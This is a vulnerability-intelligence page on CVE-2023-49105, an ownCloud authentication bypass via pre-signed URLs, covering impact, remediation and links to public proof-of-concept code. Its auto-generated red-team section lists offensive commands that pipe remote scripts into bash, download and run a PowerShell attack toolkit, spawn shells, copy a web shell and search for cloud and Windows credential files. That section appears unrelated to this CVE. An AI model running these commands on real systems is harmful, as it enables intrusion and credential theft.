CVE-2023-49105
Overview
This vulnerability is an authentication bypass affecting the ownCloud core component, specifically its WebDAV API handling of pre-signed URLs. The root cause lies in the acceptance of pre-signed URLs without verifying the presence of a configured signing key for the file owner. This flaw affects ownCloud Server versions from 10.6.0 up to, but not including, 10.13.1, allowing unauthorized access to file operations when no signing key is set.
Vulnerability Description
An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0.
Impact
An unauthenticated attacker who knows a victim's username can access, modify, or delete any file owned by that user if the victim has no signing key configured, exploiting the acceptance of pre-signed URLs without proper authentication. This allows unauthorized file operations remotely without user interaction. The CVSS vector indicates low attack complexity and no privileges or user interaction required (AV:N/AC:L/PR:N/UI:N), resulting in potential data breaches and unauthorized data manipulation.
Solution
To remediate this vulnerability, upgrade ownCloud Server to version 10.13.1 or later, where proper validation of signing keys for pre-signed URLs is enforced. Refer to the official ownCloud security advisory at https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/ for detailed patch instructions and version-specific guidance. No alternative workarounds are documented by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in ownCloud's core component prior to version 10.13.1 allows unauthorized access to files, enabling attackers to modify or delete any file if they know the username of the victim and the victim has not configured a signing key. This flaw arises from the acceptance of pre-signed URLs without requiring a signing key for the file owner. The absence of this key essentially nullifies the security mechanism intended to protect file integrity and confidentiality, making it possible for an attacker to exploit this weakness easily. The issue first appeared in version 10.6.0, indicating a significant window during which users could be affected.
Attack vectors for this vulnerability are straightforward yet alarming. An attacker can leverage knowledge of a victim's username to generate pre-signed URLs that grant access to the victim's files. This can be executed through various means, such as social engineering or information gathering, to ascertain the victim's username. Once the attacker has this information, they can craft requests to access, modify, or delete files without any authentication checks. Scenarios could include a disgruntled employee targeting a colleague or an external attacker aiming to disrupt business operations by tampering with critical data.
The real-world impact of this vulnerability is profound, particularly for organizations relying on ownCloud for file storage and sharing. The high CVSS score of 9.8 indicates a critical severity level, suggesting that successful exploitation could lead to severe data breaches, loss of sensitive information, and potential legal ramifications. Businesses could face operational disruptions, reputational damage, and financial losses due to data integrity issues. Furthermore, the ease of exploitation means that even low-skilled attackers could potentially execute successful attacks, increasing the risk profile for organizations that have not implemented adequate security measures.
Detection of this vulnerability requires a proactive approach. Organizations should conduct regular security assessments and audits of their ownCloud installations to identify any instances of the vulnerability. Monitoring access logs for unusual activity, such as unauthorized file modifications or deletions, can also help in early detection. Additionally, implementing file integrity monitoring solutions can alert administrators to changes in critical files, providing an additional layer of security.
Mitigation strategies are essential to protect against this vulnerability. The most effective measure is to upgrade to the latest version of ownCloud, where the vulnerability has been addressed. Organizations should also enforce the configuration of signing keys for all users, ensuring that pre-signed URLs cannot be exploited without proper authentication. Educating users about the importance of security practices, such as using strong passwords and enabling two-factor authentication, can further reduce the risk of exploitation. By adopting a multi-layered security approach, organizations can significantly enhance their resilience against this and similar vulnerabilities, safeguarding their data and maintaining operational integrity.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-49105, reflected by a recent surge in detection activity across multiple environments. This increase coincides with the emergence of new proof-of-concept exploits publicly available on GitHub, which have garnered attention within attacker communities. Although the EPSS score remains stable, the elevated interest and active testing suggest that threat actors are refining their capabilities to leverage the vulnerability, particularly against deployments lacking enforced signing-key configurations. This development heightens the risk profile for organizations running affected ownCloud versions, as the ease of unauthenticated file manipulation could facilitate broader compromise or data exfiltration. Consequently, defenders should recognize that the threat landscape is becoming more dynamic, with exploitation attempts likely to become more frequent and sophisticated, underscoring the criticality of timely patching and configuration hardening.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Owncloud | Owncloud Server | All |
cpe:2.3:a:owncloud:owncloud_server:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
ambionics/owncloud-exploits
ownCloud exploits for CVE-2023-49105
|
ambionics | 40 | 10 | 2023-12-05 | View |
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-49105 |
| owncloud.org |
GitHub CVE
|
https://owncloud.org/security |
| owncloud.com |
GitHub CVE
|
https://owncloud.com/security-advisories/webdav-api-authentication-bypass-using-pre-signed-urls/ |
| hunt.io |
NVD API
|
https://hunt.io/blog/chinese-speaking-operator-philippine-nuclear-naval-contractor |
| cisa.gov |
NVD API
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-49105 |